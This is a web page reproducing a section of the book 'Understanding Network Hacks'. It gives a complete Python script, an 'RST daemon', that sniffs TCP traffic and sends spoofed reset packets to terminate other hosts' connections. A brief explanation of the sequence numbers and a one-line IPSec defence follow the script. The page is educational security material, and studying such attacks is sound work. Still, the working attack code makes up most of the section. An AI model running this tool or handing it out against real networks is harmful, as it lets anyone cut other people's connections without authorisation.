Menu
Home
Log in / Register
 
Home arrow Computer Science arrow Understanding Network Hacks
< Prev   CONTENTS   Next >

5.11 RST Daemon

A RST daemon is a program that resets foreign TCP connections or, in other words, the attacker sends a spoofed TCP packet with the RST flag set to terminate a connection.

1 #!/usr/bin/python

2

3 import sys

4 import getopt

5 import pcapy

6 from scapy.all import send, IP, TCP

7 from impacket.ImpactDecoder import EthDecoder, IPDecoder

8 from impacket.ImpactDecoder import TCPDecoder

9

10

11 dev = "eth0"

12 filter = ""

13 eth_decoder = EthDecoder()

14 ip_decoder = IPDecoder()

15 tcp_decoder = TCPDecoder()

16

17

18 def handle_packet(hdr, data):

19 eth = eth_decoder.decode(data)

20 ip = ip_decoder.decode(eth.get_data_as_string())

21 tcp = tcp_decoder.decode(ip.get_data_as_string())

22

23 if not tcp.get_SYN() and not tcp.get_RST() and

24 not tcp.get_FIN() and tcp.get_ACK():

25 packet = IP(src=ip.get_ip_dst(),

26 dst=ip.get_ip_src()) /

27 TCP(sport=tcp.get_th_dport(),

28 dport=tcp.get_th_sport(),

29 seq=tcp.get_th_ack(),

30 ack=tcp.get_th_seq()+1,

31 flags="R")

32

33 send(packet, iface=dev)

34

35 print "RST %s:%d -> %s:%d" % (ip.get_ip_src(),

36 tcp.get_th_sport(),

37 ip.get_ip_dst(),

38 tcp.get_th_dport())

39

40

41 def usage():

42 print sys.argv[0] + " -i <dev> -f <pcap_filter>"

43 sys.exit(1)

44

45 try:

46 cmd_opts = "f:i:"

47 opts, args = getopt.getopt(sys.argv[1:], cmd_opts)

48 except getopt.GetoptError:

49 usage()

50

51 for opt in opts:

52 if opt[0] == "-f":

53 filter = opt[1]

54 elif opt[0] == "-i":

55 dev = opt[1]

56 else:

57 usage()

58

59 pcap = pcapy.open_live(dev, 1500, 0, 100)

60

61 if filter:

62 filter = "tcp and " + filter

63 else:

64 filter = "tcp"

65

66 pcap.setfilter(filter)

67 print "Resetting all TCP connections on %s " +

68 "matching filter %s " % (dev, filter)

69 pcap.loop(0, handle_packet)

The source code is a mix of a sniffer (see Sect. 5.4) and IP spoofing (Sect. 5.6). Only the handle_packet function differs to a normal sniffer. It constructs a new packet that seems to come from the destination of the intercepted packet. Therefore it just flips the destination and source address, destination and source port and sets the acknowledgment number to the value of the sequence number plus one (have a look at Sect. 2.9 if you don't remember why). As sequence number we set the acknowledgment number, because that is the sequence number the source expects next.

The protection possibilities against such attacks are the same as against ordinary IP spoofing threats just use IPSec and sign your IP packets cryptographically.

 
Found a mistake? Please highlight the word and press Shift + Enter  
< Prev   CONTENTS   Next >
 
Subjects
Accounting
Business & Finance
Communication
Computer Science
Economics
Education
Engineering
Environment
Geography
Health
History
Language & Literature
Law
Management
Marketing
Philosophy
Political science
Psychology
Religion
Sociology
Travel